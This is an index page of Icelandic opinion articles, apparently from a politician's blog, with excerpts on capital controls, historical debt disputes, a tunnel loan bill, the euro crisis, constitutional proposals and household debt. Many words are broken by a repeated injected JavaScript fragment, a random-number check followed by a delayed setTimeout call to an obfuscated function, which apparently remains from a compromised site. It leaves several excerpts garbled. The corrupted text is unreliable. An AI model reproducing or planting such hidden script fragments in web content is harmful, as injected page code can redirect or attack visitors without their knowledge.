Það vantar pólitíska forystu

Afnám gjaldeyrishaftanna ætlar að reynast erfiðara en talið var. Að undanförnu hafa komið fram, m.a. í skrifum Morgunblaðsins, sjónarmið sem styðja þá skoðun að vandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}inn sé mun umfangsmeiri en áður var talið. Það…

Gömul saga og ný

Fjölmörg dæmi má finna í mannkynssögunni um harðvítugar deilur um skuldamál.  Slíkar deilur hafa oft reynt mjög á og valdið togstreitu og ólgu.  Fyrir um 2.500 árum setti Sólon lög í Aþenu sem léttu oki af skuldurum og frelsaði þá…

Grískt bókhald

Nú liggur fyrir Alþingi frumvarp frá fjármálaráðherra þar sem ráðherrann fer fram á heimild til að lána hlutafélagi fé til að grafa svo kölluð Vaðlaheiðargöng. Þetta verkefni hefur verið tekið út fyrir vegaáætlun á þeirri forsendu að um sé að…

Breyttar forsendur

Vandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}i evrunnar er ekki bara vandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}i evruríkjanna einna. Evrusvæðið gegnir lykilhlutverki í heimsbúskapnum og fyrir efnahag okkar Íslendinga er það mikið hagmunamál að farsæl lausn finnist…

Stundum fjölskipað og stundum ekki

Í tillögum Stjórnlagaráðs, grein 86, er gert ráð fyrir því að sérhver ráðherra ríkisstjórnarinnar beri ábyrgð á sínum málaflokki eins og verið hefur hingað til. En í næstu grein, grein 87, er lagt til að þegar um mikilvægar eða stefnumótandandom()…

Áherslur

Grunngildi Mikilvægasta verkefni Sjálfstæðisflokksins er að skapa skilyrði til þess að verðmætasköpun landandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}smanna sé sem mest þannig að lífskjör þjóðarinnar batni jafnt og þétt. Frelsi einstaklingsins er grundvöllur margbreytilegs og fjölbreytts mannlífs ásamt…

Hagfræði heimila og þjóðar

Í hvað vill þjóðin eyða skattfé sínu? Mig rámar í skoðanakönnun sem gerð var fyrir margt löngu þar sem meðal annars var spurt um hvaða starfsgreinar mönnum líkaði verst við. Það vakti athygli mína þá að hagfræðingar voru verst þokkaðir…

Skuldug heimili ógna bönkunum

Ríkisstjórnin beindi þeirri spurningu til Hagfræðistofnunar Háskóla Íslandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s hversu miklar afskriftir á skuldum heimilanna bankarnir þyldu. Svarið barst á dögunum í formi skýrslu sem hefur verið nokkuð rædd á undanförnum. Ekkert er við…